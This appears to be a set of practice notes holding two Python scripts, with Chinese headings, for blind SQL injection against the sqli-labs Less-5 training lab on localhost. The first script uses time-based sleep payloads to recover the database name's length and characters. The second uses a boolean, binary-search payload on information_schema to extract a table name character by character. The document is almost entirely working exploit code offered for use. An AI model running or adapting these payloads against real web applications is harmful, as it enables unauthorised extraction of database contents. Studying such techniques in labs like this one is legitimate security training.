自增脚本
# coding:utf-8
import requests
import datetime
import time
# 获取数据库名长度
def database_len():
for i in range(1, 10):
url = "http://127.0.0.1/sqli-labs/Less-5/index.php"
payload = " ?id=1' and if(length(database())>%s,sleep(1),0) --+" % i
# print(url+payload+'%23')
time1 = datetime.datetime.now()
r = requests.get(url + payload)
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >= 1:
print(i)
else:
print(i)
break
print('database_len:', i)
#获取数据库名
def database_name():
name = ''
for j in range(1,9):
for i in 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.':
#0123456789abcdefghijklmnopqrstuvwxyz
url = "http://127.0.0.1/sqli-labs/Less-5/index.php"
payload = "?id=1' and if(substr(database(),%d,1)='%s',sleep(3),0) --+" % (j,i)
#print(url+payload)
time1 = datetime.datetime.now()
r = requests.get(url + payload)
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >=3:
name += i
print(name)
break
print('database_name:', name)
if __name__ == '__main__':
database_name()
二分法脚本
# -*- coding: utf-8 -*-
import requests
url="http://127.0.0.1/sqli-labs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{b},1))<{a}--+ "
tablename=''
for b in range(1,10):
min=0
max=127
while (max-min)>1:
mid=(min+max)//2#(整数除法)
payload = url.format(a=mid, b=b)
print (payload)
r=requests.get(payload,timeout=10)
print (r.text)
if 'are' in r.text:
max=mid
else:
min=mid
tablename+=chr(min)
print(min)
print(tablename)
print (tablename)